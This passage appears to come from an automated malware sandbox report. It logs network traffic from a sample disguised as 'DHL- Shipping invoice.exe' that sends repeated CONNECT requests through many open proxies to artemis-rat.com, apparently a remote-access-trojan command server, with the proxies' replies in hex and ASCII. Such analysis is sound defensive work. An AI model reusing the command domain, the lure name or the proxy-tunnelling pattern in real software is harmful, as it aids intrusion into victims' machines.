                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.562715054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.562742949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1430192.168.2.454131103.23.101.3041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.304783106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1431192.168.2.454336172.67.182.118806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.309914112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.397175074 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1432192.168.2.454144115.84.248.14080806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.310777903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.619072914 CET1286INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.6.40
                            X-Powered-By: PHP/5.6.40
                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                            Pragma: no-cache
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Content-Length: 3172
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 20 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 20 5a 65 72 6f 20 31 31 2e 32 2e 30 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 2c 20 4d 50 47 2c 20 4d 69 6b 65 20 47 6c 65 61 76 65 73 2c 20 52 69 63 2c 20 55 6e 69 53 65 72 76 65 72 2c 20 4f 6c 61 6a 69 64 65 2c 20 42 6f 62 53 20 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 2e 69 6e 74 72 6f 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 37 45 37 46 44 3b 0d 0a 7d 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 0d 0a 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0d 0a 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 75 6e 69 66 6f 72 6d 73 65 72 76 65 72 2e 63 6f 6d 22 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 61 6c 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 22
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><title>The Uniform Server </title><meta name="Description" content="The Uniform Server Zero 11.2.0" /><meta name="Keywords" content="The Uniform Server, MPG, Mike Gleaves, Ric, UniServer, Olajide, BobS " /><link rel="stylesheet" type="text/css" href="css/style.css" media="screen" /></head><style type="text/css">/*****************************************/.intro{ margin-top:30px; padding:10px; font-size:12px; font-family:Verdana; background-color: #E7E7FD;}/*****************************************/</style><body><div id="wrap"> <div id="header"> <a href="http://www.uniformserver.com"><img src="images/logo.png" align="left" alt="The Uniform Server"
                            Mar 12, 2024 08:37:05.932502031 CET454INHTTP/1.1 400 Bad Request
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.6.40
                            Content-Length: 226
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1433192.168.2.45277367.205.177.122404486484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.311558962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.343782902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.453308105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1434192.168.2.45426586.8.163.8891506484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.314132929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.840461969 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1435192.168.2.453697194.4.50.94123346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.314604998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1436192.168.2.45431323.137.248.19788886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.314847946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1437192.168.2.454372172.67.53.215806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.314944983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.402631998 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1438192.168.2.45429265.109.152.8888886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.323671103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:35.513642073 CET270INHTTP/1.1 503 Service Unavailable
                            Content-Type: text/plain; charset=utf-8
                            X-Content-Type-Options: nosniff
                            Date: Tue, 12 Mar 2024 07:37:35 GMT
                            Content-Length: 102
                            Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 35 30 38 31 30 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a
                            Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:50810->1.1.1.1:53: i/o timeout


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1439192.168.2.454169171.244.140.160116146484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.326783895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.140851021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.250300884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.344074011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.547220945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.750359058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.953207970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.452939034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:47.249877930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1440192.168.2.45431546.226.160.113806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.349406004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.541719913 CET176INHTTP/1.1 404 Not Found
                            Content-Type: text/plain; charset=utf-8
                            X-Content-Type-Options: nosniff
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Length: 19
                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                            Data Ascii: 404 page not found


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1441192.168.2.45417038.54.116.981186484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.349453926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.707341909 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1442192.168.2.454331187.252.154.9041536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.349896908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1443192.168.2.454135103.86.109.38806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.350763083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1444192.168.2.454314189.232.91.8580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.352297068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.558474064 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1445192.168.2.45436351.75.126.150118026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.352967978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.843816996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1446192.168.2.454244114.55.84.12300016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.356538057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.678960085 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
